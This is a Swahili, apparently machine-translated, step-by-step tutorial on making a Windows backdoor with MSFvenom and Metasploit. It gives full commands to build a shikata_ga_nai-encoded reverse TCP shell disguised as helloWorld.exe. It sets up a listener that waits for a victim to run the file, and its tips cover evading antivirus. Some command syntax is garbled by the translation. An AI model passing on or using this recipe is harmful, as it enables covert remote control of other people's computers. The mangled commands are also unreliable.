Mlango wa nyuma hutumiwa kupitisha mifumo ya usalama, mara nyingi kwa siri na haswa bila kutambulika. Kutumia MSFvenom, mchanganyiko wa msfpayload na msfencode, inawezekana kuunda mlango wa nyuma ambao unaunganisha nyuma kwa mshambuliaji kwa kutumia ganda la nyuma la TCP. Ili kukuza mlango wa nyuma, unahitaji kubadilisha saini ya zisizo zako kukwepa programu yoyote ya antivirus. Kamilisha mradi huu kwa jozi ya kompyuta ambazo una ruhusa ya kuzifikia, na katika mchakato huo, utajifunza zaidi juu ya usalama wa kompyuta na jinsi aina hii ya mlango wa nyuma inavyofanya kazi.
Hatua
Hatua ya 1. Anzisha Kali na choma moto dashibodi ya Kituo
Hatua ya 2. Andika ifconfig kuonyesha kiolesura na angalia anwani yako ya IP
Hatua ya 3. Andika msfvenom -l encoders kuonyesha orodha ya encoders
Utatumia x86 / shikata_ga_nai kama kisimbuzi
Hatua ya 4. Andika "msfvenom -a x86 - jukwaa windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe
- -a x86 - windows windows huteua usanifu wa kutumia.
- -p windows / shell / reverse_tcp huteua upakiaji wa malipo ili kupachika.
- LHOST inateua anwani ya IP ya msikilizaji.
- LPORT inataja bandari ya msikilizaji.
- -b "\ x00" inateua kuepusha tabia mbaya (null byte).
- -e x86 / shikata_ga_nai inataja jina la encoders.
- -f exe> helloWorld.exe inataja pato la fomati.
Hatua ya 5. Andika msfconsole ili kuamsha Metasploit
Sasa umetengeneza mlango wako wa nyuma. Wakati mhasiriwa atabonyeza helloWorld.exe, mzigo wa malipo ya ganda ambao umeingizwa utaamilishwa na kurudisha unganisho kwenye mfumo wako. Ili kupokea unganisho, lazima ufungue kiboreshaji anuwai katika Metasploit na uweke malipo ya malipo
Hatua ya 6. Aina ya matumizi ya kutumia / anuwai / kichunguzi
Hatua ya 7. Aina ya kuweka malipo ya windows / shell / reverse_tcp
Hatua ya 8. Andika chaguzi za onyesho la kuangalia moduli
Hatua ya 9. Aina ya kuweka LHOST 192.168.48.129
"LHOST" inataja anwani ya IP ya msikilizaji
Hatua ya 10. Aina ya kuweka LPORT 4444
"LPORT" inataja bandari ya msikilizaji
Hatua ya 11. Chapa kukimbia na subiri unganisho kutoka kwa mashine ya mhasiriwa
Hatua ya 12. Subiri mwathirika abonyeze helloWorld.exe
Kisha utaunganishwa kwa mafanikio na mashine ya mwathirika.
Vidokezo
- Kutumia -i katika MSFvenom itawakilisha matamshi ya usimbuaji. Wakati mwingine kurudia zaidi kunaweza kusaidia kukwepa programu ya AV.
- Umejifunza jinsi ya kutengeneza mlango wa nyuma na usimbuaji kwa kutumia MSFvenom, lakini njia hii haitafanya kazi kikamilifu dhidi ya programu zingine za AV siku hizi. Sababu ya hii ni kwa sababu ya templeti za utekelezaji katika MSFvenom. Wauzaji wa AV wameongeza saini tuli ya templeti hizi na wazitafute tu. Suluhisho la suala hili ni kutumia templeti tofauti ya utekelezaji au zana tofauti.